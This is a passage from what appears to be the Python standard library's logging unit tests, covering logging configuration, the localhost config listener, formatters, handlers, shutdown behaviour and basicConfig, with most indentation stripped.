# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
#Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
#Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
#Nothing will be output since the handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
#Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_10_ok(self):
with captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_1_ok(self):
with captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertTrue(c1 is logging.getLogger('xyz'))
self.assertTrue(c2 is logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertTrue(c1 is logging.getLogger('abc.def'))
self.assertTrue(c2 is logging.getLogger('abc.def.ghi'))
self.assertTrue(c2 is c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
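# QueueListener runs a background thread that pulls records off the queue and
# dispatches each one to its handler(s); stop() signals that thread and waits
# for it to finish before returning.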
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = TestHandler(Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
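# Formatter supports three format styles: '%' (the default, %-formatting),
# '{' (str.format fields) and '$' (string.Template substitution); the tests
# below exercise each style in turn.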
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
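# formatTime's default output is time.strftime('%Y-%m-%d %H:%M:%S') with the
# millisecond value appended after a comma, hence '...08:03:00,123' below.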
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
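# logging.lastResort is a stderr StreamHandler with level WARNING; it is used
# when a record is emitted and no handlers can be found. Setting it to None
# restores the old 'No handlers could be found' message instead.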
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_stderr = sys.stderr
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
sys.stderr = sio = io.StringIO()
root.debug('This should not appear')
self.assertEqual(sio.getvalue(), '')
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), 'This is your final chance!\n')
#No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), 'No handlers could be found for logger "root"\n')
# 'No handlers' message only printed once
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), '')
root.manager.emittedNoHandlerWarning = False
#If raiseExceptions is False, no message is printed
logging.raiseExceptions = False
sys.stderr = sio = io.StringIO()
root.warning('This is your final chance!')
self.assertEqual(sio.getvalue(), '')
finally:
sys.stderr = old_stderr
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
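# FakeHandler is not a real handler: it simply records calls to its acquire/flush/
# close/release methods so that ShutdownTest below can verify that logging.shutdown()
# processes handlers in reverse order of registration and still releases them when
# one of those methods raises an error.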
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
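# RecordingHandler keeps every record it handles in memory; several tests use it
# to inspect what was logged without writing anything to a stream.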
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', IOError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', IOError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', IOError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
def _test_log(self, method, level=None):
called = []
patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
if threading:
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.level = self.original_logging_level
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_filename(self):
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.addCleanup(expected.close)
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
def test_filemode(self):
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.addCleanup(expected.close)
self.assertEqual(handler.stream.mode, expected.stream.mode)
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='foo')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, 'foo')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
old_raise = logging.raiseExceptions
        self.addCleanup(setattr, logging, 'raiseExceptions', old_raise)
logging.raiseExceptions = True
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
old_raise = logging.raiseExceptions
        self.addCleanup(setattr, logging, 'raiseExceptions', old_raise)
logging.raiseExceptions = False
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
